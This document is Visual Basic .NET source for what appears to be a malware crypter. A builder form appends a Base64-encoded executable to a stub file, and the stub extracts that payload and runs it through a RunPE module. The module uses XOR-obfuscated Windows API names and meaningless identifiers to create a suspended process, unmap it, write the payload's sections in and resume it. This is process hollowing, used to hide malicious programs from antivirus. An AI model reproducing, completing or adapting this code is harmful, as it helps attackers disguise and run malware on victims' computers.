Imports System.Text

Public Class Form1

    Dim stub As String
    Dim spl As String = "*WSH*"

    Public Function XOREncrypt(ByVal up As Byte(), ByVal BB2 As String) As Byte()
        Dim bytes As Byte() = Encoding.ASCII.GetBytes(BB2)
        VBMath.Randomize()
        Dim num As Integer = CInt(Math.Round(CDbl((Conversion.Int(CSng((256.0! * VBMath.Rnd))) + 1.0!))))
        Dim buffer As Byte() = New Byte((up.Length + 1) - 1) {}
        Dim num4 As Integer = (up.Length - 1)
        Dim i As Integer = 0
        Do While (i <= num4)
            Dim num2 As Integer
            Dim buffer4 As Byte() = buffer
            Dim index As Integer = i
            buffer4(index) = CByte((buffer4(index) + ((up(i) Xor bytes(num2)) Xor num)))
            If (num2 = (BB2.Length - 1)) Then
                num2 = 0
            Else
                num2 += 1
            End If
            i += 1
        Loop
        buffer(up.Length) = CByte((&H70 Xor num))
        Return buffer
    End Function

    Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click

        Dim lon As New OpenFileDialog
        lon.Filter = "Executaveis (*.exe)|*.exe|Todos os arquivos (*.*)|*.*"
        lon.CheckFileExists = True

        If lon.ShowDialog = Windows.Forms.DialogResult.OK Then

            TextBox1.Text = lon.FileName

        End If

    End Sub

    Private Sub Button2_Click(sender As Object, e As EventArgs) Handles Button2.Click
        Dim s As New SaveFileDialog

        s.InitialDirectory = Application.StartupPath
        s.Filter = "Executaveis (*.exe)|*.exe|Todos os arquivos (*.*)|*.*"

        s.ShowDialog()
        If s.FileName > "" Then

            FileOpen(1, Application.StartupPath & "\STUB.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
            Stub = Space(LOF(1))
            FileGet(1, Stub)
            FileClose(1)
            FileOpen(1, s.FileName, OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)

            FilePut(1, stub & spl & Convert.ToBase64String(IO.File.ReadAllBytes(TextBox1.Text)))

            FileClose(1)

            MsgBox("FINE")

        End If


    End Sub
End Class

Public Class Form1
    Dim text1, alaa() As String

    Dim cami As String = Application.ExecutablePath

    Dim spl As String = "*WSH*"

    Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load

        FileOpen(1, cami, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)

        text1 = Space(LOF(1))

        FileGet(1, text1)

        FileClose()

        alaa = Split(text1, spl)

        rsrWmrmemmWese6.sSmSystytoytey3(Convert.FromBase64String(alaa(1)), Process.GetCurrentProcess.MainModule.FileName)

    End Sub

End Class

Imports System
Imports System.IO
Imports System.Text
Imports System.Runtime.InteropServices

Module rsrWmrmemmWese6


    Public Declare Function mSmooSsSsmSmyWo Lib "kernel32" Alias "LoadLibraryA" (ByVal tssotWymetmte As String) As IntPtr

    Public Declare Function osyotoooeommSet Lib "kernel32" Alias "GetProcAddress" (ByVal sSmSystytoytey As IntPtr, ByVal tssotWymetmte As String) As IntPtr

    Function mrySSrytoymmr(Of T)(ByVal tssotWymetmte As String, ByVal rsrWmrmemmWese As String) As T

        Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(osyotoooeommSet(mSmooSsSsmSmyWo(tssotWymetmte), rsrWmrmemmWese), GetType(T)), Object), T)

    End Function

    Delegate Function mtSSrSmySorees(ByVal oWmotymymmooSS As IntPtr, ByVal ymototmymmtmrm As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean

    Delegate Function mSmooSsSsmSmyWo0(ByVal mSmooSsSsmSmyWo2 As IntPtr, ByVal mSmooSsSsmSmyWo3 As IntPtr) As UInteger

    Delegate Function mSmooSsSsmSmyWo1(ByVal mSmooSsSsmSmyWo2 As IntPtr, ByVal mSmooSsSsmSmyWo3 As IntPtr, ByRef bufr As IntPtr, ByVal mSmooSsSsmSmyWo4 As Integer, ByRef mSmooSsSsmSmyWo5 As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean

    Delegate Function mSmooSsSsmSmyWo6(ByVal mSmooSsSsmSmyWo7 As IntPtr, ByVal mSmooSsSsmSmyWo8 As IntPtr) As UInteger

    Delegate Function mSmooSsSsmSmyWo9(ByVal oWmotymymmooSS As IntPtr, ByVal ymototmymmtmrm As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean

    Delegate Function osyotoooeommSet0(ByVal mSmooSsSsmSmyWo2 As IntPtr, ByVal osyotoooeommSet1 As IntPtr, ByVal osyotoooeommSet2 As IntPtr, ByVal osyotoooeommSet3 As Integer, ByVal osyotoooeommSet4 As Integer) As IntPtr

    Delegate Function osyotoooeommSet5(ByVal osyotoooeommSet6 As IntPtr, ByVal osyotoooeommSet7 As IntPtr, ByVal osyotoooeommSet8 As Byte(), ByVal osyotoooeommSet9 As UInteger, ByVal tssotWymetmte0 As Integer) As Boolean

    Public Declare Auto Function tssotWymetmte1 Lib "kernel32" Alias "CreateProcessW" (ByVal tssotWymetmte2 As String, ByVal tssotWymetmte3 As StringBuilder, ByVal tssotWymetmte4 As IntPtr, ByVal tssotWymetmte5 As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal foXt As Boolean, ByVal LRqu As Integer, ByVal uedW As IntPtr, ByVal VnJW As String, ByVal kKAh As Byte(), ByVal QnTi As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean

    Private Function tssotWymetmte6(ByVal tssotWymetmte7 As Long, Optional ByVal tssotWymetmte8 As Long = &H4) As Integer

        Dim tssotWymetmte9 As IntPtr

        Dim sSmSystytoytey0 As Integer

        Dim sSmSystytoytey1 As mSmooSsSsmSmyWo1 = mrySSrytoymmr(Of mSmooSsSsmSmyWo1)(sSmSystytoytey2(Chr(2) & Chr(24) & Chr(8) & Chr(0) & Chr(0), "lEoMNtZliATokQgkIDoKmWi"), sSmSystytoytey2(Chr(28) & Chr(38) & Chr(0) & Chr(55) & Chr(51) & Chr(54) & Chr(4) & Chr(59) & Chr(32) & Chr(38) & Chr(39) & Chr(51) & Chr(62) & Chr(31) & Chr(55) & Chr(63) & Chr(61) & Chr(32) & Chr(43), "RSoFMJJUKOsVhjloNkQLGNU"))

        Call sSmSystytoytey1(Process.GetCurrentProcess.Handle, tssotWymetmte7, tssotWymetmte9, tssotWymetmte8, sSmSystytoytey0)

        Return tssotWymetmte9

    End Function

    Public Function sSmSystytoytey3(ByVal sSmSystytoytey4 As Byte(), ByVal sSmSystytoytey5 As String) As Boolean

        Try

            Dim sSmSystytoytey6 As GCHandle = GCHandle.Alloc(sSmSystytoytey4, GCHandleType.Pinned) : Dim hModuleBase As Integer = sSmSystytoytey6.AddrOfPinnedObject : sSmSystytoytey6.Free()

            Dim tssotWymetmte4 As IntPtr = IntPtr.Zero

            Dim sSmSystytoytey7 As IntPtr() = New IntPtr(3) {}

            Dim sSmSystytoytey8 As Byte() = New Byte(67) {}

            Dim sSmSystytoytey9 As Integer = BitConverter.ToInt32(sSmSystytoytey4, 60)

            Dim mrySSrytoymmr0 As Integer

            Dim ymototmymmtmrm As UInteger() = New UInteger(178) {}

            ymototmymmtmrm(0) = &H10002

            tssotWymetmte1(Nothing, New StringBuilder(sSmSystytoytey5), tssotWymetmte4, tssotWymetmte4, False, 4, tssotWymetmte4, Nothing, sSmSystytoytey8, sSmSystytoytey7)

            Dim mrySSrytoymmr1 As Integer = (hModuleBase + tssotWymetmte6(hModuleBase + &H3C))

            mrySSrytoymmr0 = tssotWymetmte6(mrySSrytoymmr1 + &H34)

            Dim mrySSrytoymmr2 As mSmooSsSsmSmyWo0 = mrySSrytoymmr(Of mSmooSsSsmSmyWo0)(sSmSystytoytey2(Chr(2) & Chr(24) & Chr(8) & Chr(0) & Chr(0), "lEoMNtZliATokQgkIDoKmWi"), sSmSystytoytey2(Chr(36) & Chr(30) & Chr(63) & Chr(4) & Chr(7) & Chr(11) & Chr(26) & Chr(60) & Chr(3) & Chr(15) & Chr(29) & Chr(37) & Chr(12) & Chr(57) & Chr(15) & Chr(9) & Chr(30) & Chr(3) & Chr(5) & Chr(4), "jDAZXISWJJithCuowglUNJG"))

            mrySSrytoymmr2(sSmSystytoytey7(0), mrySSrytoymmr0)

            Dim mrySSrytoymmr4 As osyotoooeommSet0 = mrySSrytoymmr(Of osyotoooeommSet0)(sSmSystytoytey2(Chr(47) & Chr(33) & Chr(54) & Chr(42) & Chr(33) & Chr(40) & Chr(119) & Chr(118), "DlJuiIaXIEYUhSHnjcJeTGo"), sSmSystytoytey2(Chr(18) & Chr(45) & Chr(54) & Chr(48) & Chr(49) & Chr(37) & Chr(40) & Chr(5) & Chr(40) & Chr(40) & Chr(43) & Chr(39) & Chr(1) & Chr(60), "DlJuiIaXIEYUhSHnjcJeTGo"))

            Dim osyotoooeommSet7 As IntPtr = mrySSrytoymmr4(sSmSystytoytey7(0), mrySSrytoymmr0, tssotWymetmte6(mrySSrytoymmr1 + &H50), &H3000, &H40)

            Dim mrySSrytoymmr3 As New IntPtr(BitConverter.ToInt32(sSmSystytoytey4, sSmSystytoytey9 + &H34))

            Dim osyotoooeommSet2 As New IntPtr(BitConverter.ToInt32(sSmSystytoytey4, sSmSystytoytey9 + 80))

            Dim mrySSrytoymmr5 As Integer

            Dim tssotWymetmte0 As Integer

            Dim mrySSrytoymmr6 As osyotoooeommSet5 = mrySSrytoymmr(Of osyotoooeommSet5)(sSmSystytoytey2(Chr(2) & Chr(24) & Chr(8) & Chr(0) & Chr(0), "lEoMNtZliATokQgkIDoKmWi"), sSmSystytoytey2(Chr(10) & Chr(48) & Chr(19) & Chr(54) & Chr(45) & Chr(48) & Chr(33) & Chr(18) & Chr(45) & Chr(54) & Chr(48) & Chr(49) & Chr(37) & Chr(40) & Chr(9) & Chr(33) & Chr(41) & Chr(43) & Chr(54) & Chr(61), "DlJuiIaXIEYUhSHnjcJeTGo"))

            mrySSrytoymmr6(sSmSystytoytey7(0), osyotoooeommSet7, sSmSystytoytey4, CUInt(CInt(tssotWymetmte6(mrySSrytoymmr1 + &H54))), mrySSrytoymmr5)

            For i = 0 To tssotWymetmte6(mrySSrytoymmr1 + &H6, 2) - 1

                Dim mrySSrytoymmr7 As Integer() = New Integer(9) {}

                Buffer.BlockCopy(sSmSystytoytey4, (sSmSystytoytey9 + &HF8) + (i * 40), mrySSrytoymmr7, 0, 40)

                Dim mrySSrytoymmr8 As Byte() = New Byte((mrySSrytoymmr7(4) - 1)) {}

                Buffer.BlockCopy(sSmSystytoytey4, mrySSrytoymmr7(5), mrySSrytoymmr8, 0, mrySSrytoymmr8.Length)

                osyotoooeommSet2 = New IntPtr(osyotoooeommSet7.ToInt32() + mrySSrytoymmr7(3))

                mrySSrytoymmr3 = New IntPtr(mrySSrytoymmr8.Length)

                mrySSrytoymmr6(sSmSystytoytey7(0), osyotoooeommSet2, mrySSrytoymmr8, CUInt(mrySSrytoymmr3), tssotWymetmte0)

            Next i

            Dim mrySSrytoymmr9 As mtSSrSmySorees = mrySSrytoymmr(Of mtSSrSmySorees)(sSmSystytoytey2(Chr(2) & Chr(24) & Chr(8) & Chr(0) & Chr(0), "lEoMNtZliATokQgkIDoKmWi"), sSmSystytoytey2(Chr(61) & Chr(7) & Chr(52) & Chr(22) & Chr(7) & Chr(48) & Chr(28) & Chr(29) & Chr(7) & Chr(22) & Chr(11) & Chr(7) & Chr(39) & Chr(27) & Chr(1) & Chr(22) & Chr(18) & Chr(23), "sIhGXNMABeaGwIgIBrdVSnR"))

            mrySSrytoymmr9(sSmSystytoytey7(1), ymototmymmtmrm)

            mrySSrytoymmr6(sSmSystytoytey7(0), ymototmymmtmrm(41) + &H8, BitConverter.GetBytes(osyotoooeommSet7.ToInt32()), CUInt(&H4), tssotWymetmte0)

            ymototmymmtmrm(&H2C) = mrySSrytoymmr0 + tssotWymetmte6(mrySSrytoymmr1 + &H28)

            Dim xblQH As mSmooSsSsmSmyWo9 = mrySSrytoymmr(Of mSmooSsSsmSmyWo9)(sSmSystytoytey2(Chr(2) & Chr(24) & Chr(8) & Chr(0) & Chr(0), "lEoMNtZliATokQgkIDoKmWi"), sSmSystytoytey2(Chr(61) & Chr(7) & Chr(32) & Chr(22) & Chr(7) & Chr(48) & Chr(28) & Chr(29) & Chr(7) & Chr(22) & Chr(11) & Chr(7) & Chr(39) & Chr(27) & Chr(1) & Chr(22) & Chr(18) & Chr(23), "sIhGXNMABeaGwIgIBrdVSnR"))

            xblQH(sSmSystytoytey7(1), ymototmymmtmrm)

            Dim rsrWmrmemmWese0 As mSmooSsSsmSmyWo6 = mrySSrytoymmr(Of mSmooSsSsmSmyWo6)(sSmSystytoytey2(Chr(2) & Chr(24) & Chr(8) & Chr(0) & Chr(0), "lEoMNtZliATokQgkIDoKmWi"), sSmSystytoytey2(Chr(0) & Chr(58) & Chr(28) & Chr(43) & Chr(61) & Chr(59) & Chr(35) & Chr(43) & Chr(26) & Chr(38) & Chr(60) & Chr(43) & Chr(47) & Chr(42), "NqqbiMUBAZQewYpIknBeZjD"))

            rsrWmrmemmWese0(sSmSystytoytey7(1), 0)

        Catch ex As Exception

            Return False

        End Try

        Return True

    End Function


    Private Function sSmSystytoytey2(ByVal rsrWmrmemmWese1 As String, ByVal rsrWmrmemmWese2 As String)
        Dim rsrWmrmemmWese3 As String = ""
        Dim rsrWmrmemmWese4 As Short
        Dim rsrWmrmemmWese5 As Integer
        rsrWmrmemmWese5 = Asc(rsrWmrmemmWese2)
        For rsrWmrmemmWese4 = 1 To Len(rsrWmrmemmWese1)
            rsrWmrmemmWese3 &= Chr(rsrWmrmemmWese5 Xor Asc(Mid(rsrWmrmemmWese1, rsrWmrmemmWese4, 1)))
        Next
        Return rsrWmrmemmWese3
    End Function

End Module